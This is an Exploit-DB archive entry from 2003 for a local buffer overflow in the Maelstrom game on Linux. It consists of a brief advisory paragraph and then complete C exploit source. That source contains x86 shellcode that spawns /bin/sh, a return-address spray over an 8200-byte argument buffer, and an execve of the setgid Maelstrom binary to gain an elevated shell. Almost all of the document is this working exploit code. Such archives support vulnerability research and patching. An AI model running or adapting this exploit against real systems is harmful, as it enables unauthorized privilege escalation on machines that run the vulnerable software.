Maelstrom Player 3.0.x Argument Buffer Overflow Vulnerability 2

2003-05-20T00:00:00
ID EDB-ID:22617
Type exploitdb
Reporter knight420
Modified 2003-05-20T00:00:00

Description

Maelstrom Player 3.0.x Argument Buffer Overflow Vulnerability (2). Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/7632/info
 
Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.
 
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games.
 
It should be noted that although this vulnerability has been reported to affect Maelstrom version 3.0.6 and 3.0.5 previous versions might also be affected. 

/*
 * ==================================================
 * MaelstromX.c /usr/bin/Maelstrom local exploit
 * By: Knight420
 * 05/20/03
 *
 * Gr33tz to: sorbo, sonyy, sloth, and all of #open
 *
 *  -player or -server works
 * ( ./MaelstromX 100 3 ) works on slackware 8.1
 *
 * (C) COPYRIGHT Blue Ballz , 2003
 * all rights reserved
 * =================================================
 *
 */

#include <stdio.h>

#define STACK_START 0xC0000000
#define SWITCH "-player"

char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
        "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
        "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
        "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
        char buff[8200];
        char buff2[8200];
        int *ptr;
        int ret;
        char *arg[] = { "Maelstrom",SWITCH,buff,NULL } ;
        char *env[] = { buff2, NULL };

        if(argc < 2) {
	      printf ("Maelstrom Local Exploit by: Knight420\n");  
              printf("Usage: %s <ret> <align>\n",argv[0]);
                exit(0);
        }

        ret = STACK_START - atoi(argv[1]);
	  memset(buff,'A',100);
        for(ptr = (int*)&buff[atoi(argv[2])]; ptr < (int*)&buff[8200]; ptr++)
                *ptr = ret;
        buff[sizeof(buff)-1] = 0;
        memcpy(buff,"1@",2);

        snprintf(buff2,sizeof(buff2),"SHELL=%s",shellcode);
	  printf ("Maelstrom Local Exploit by: Knight420\n");
        printf ("Return Addr: %p\n",ret);
        printf ("Spawning sh3ll\n");
        execve("/usr/local/bin/Maelstrom",arg,env);
}